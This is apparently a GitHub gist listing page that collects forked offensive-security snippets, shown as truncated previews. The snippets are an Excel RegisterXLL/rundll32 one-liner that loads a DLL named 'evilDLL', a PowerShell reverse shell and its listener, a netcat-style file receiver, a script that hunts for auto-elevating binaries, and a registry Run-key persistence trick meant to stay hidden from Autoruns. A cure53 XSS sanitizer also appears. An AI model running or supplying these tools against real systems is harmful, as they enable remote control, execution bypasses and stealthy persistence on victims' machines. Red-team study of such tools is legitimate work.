sasqwatch
/ excel.bat
Created
April 10, 2017 16:56
— forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM rundll32 mshtml.dll HTA one-liner command: | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
sasqwatch
/ gist:9a84a57ab4536a631ce9cb8c9740ec56
Created
April 13, 2017 05:45
— forked from dafthack/gist:8aa4ff60cd9352448a372ce1a7b2e27e
Easy Metasploit Install on Windows Subsystem for Linux
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux | |
| 1.) Enable Developer Mode | |
| C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1" | |
| 2.) Enable Windows Subsystem for Linux | |
| C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux | |
| 3.) Reboot |
sasqwatch
/ findelevate.py
Created
May 25, 2017 05:15
— forked from riyazwalikar/findelevate.py
Python script to find all Windows binaries with autoElevate=True (uses sigcheck obviously)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Usage: findelevate.py C:\Windows\System32\ | |
| # Needs sigcheck.exe in path [https://technet.microsoft.com/en-us/sysinternals/bb897441.aspx] | |
| import sys | |
| import os | |
| import glob | |
| import subprocess | |
| if len(sys.argv) < 2: | |
| print "Usage: findelevate.py <PATH>" |
sasqwatch
/ receivefile.ps1
Created
May 31, 2017 19:15
— forked from staaldraad/receivefile.ps1
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 192.168.1.7 8080```
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080); | |
| if($socket -eq $null){ | |
| exit 1; | |
| } | |
| $socket.start(); | |
| $client = $socket.AcceptTcpClient(); | |
| $stream = $client.GetStream(); | |
| $buffer = new-object System.Byte[] 2048; | |
| $file = 'c:/afile.exe'; | |
| $fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write'); |
sasqwatch
/ mini-reverse.ps1
Created
May 31, 2017 19:15
— forked from staaldraad/mini-reverse.ps1
A reverse shell in Powershell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
sasqwatch
/ mini-reverse-listener.ps1
Created
May 31, 2017 19:15
— forked from staaldraad/mini-reverse-listener.ps1
A reverse shell listener in powershell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413); | |
| if($socket -eq $null){ | |
| exit 1 | |
| } | |
| $socket.start() | |
| $client = $socket.AcceptTcpClient() | |
| write-output "[*] Connection!" |
sasqwatch
/ test.reg
Created
July 5, 2017 19:58
— forked from hasherezade/test.reg
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more: https://twitter.com/hasherezade/status/849756054145699840)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] | |
| @="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\"" |
sasqwatch
/ XSS Protection in 5 common contexts
Created
October 19, 2017 17:13
— forked from cure53/XSS Protection in 5 common contexts
Per-Context Sanitizer Functions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * XSS protection function for HTML context only | |
| * @usecases | |
| * <title>use this function if output reflects here or as a content of any HTML tag.</title> | |
| * e.g., <span>use this function if output reflects here</span> | |
| * e.g., <div>use this function if output reflects here</div> | |
| * @description | |
| * Sanitize/Filter < and > so that attacker can not leverage them for JavaScript execution. |
sasqwatch
/ wordpress2.md
Created
October 19, 2017 17:14
— forked from cure53/wordpress2.md
WordPress SOME bug in plupload.flash.swf
sasqwatch
/ wordpress.md
Created
October 19, 2017 17:14
— forked from cure53/wordpress.md
WordPress Flash XSS in flashmediaelement.swf
OlderNewer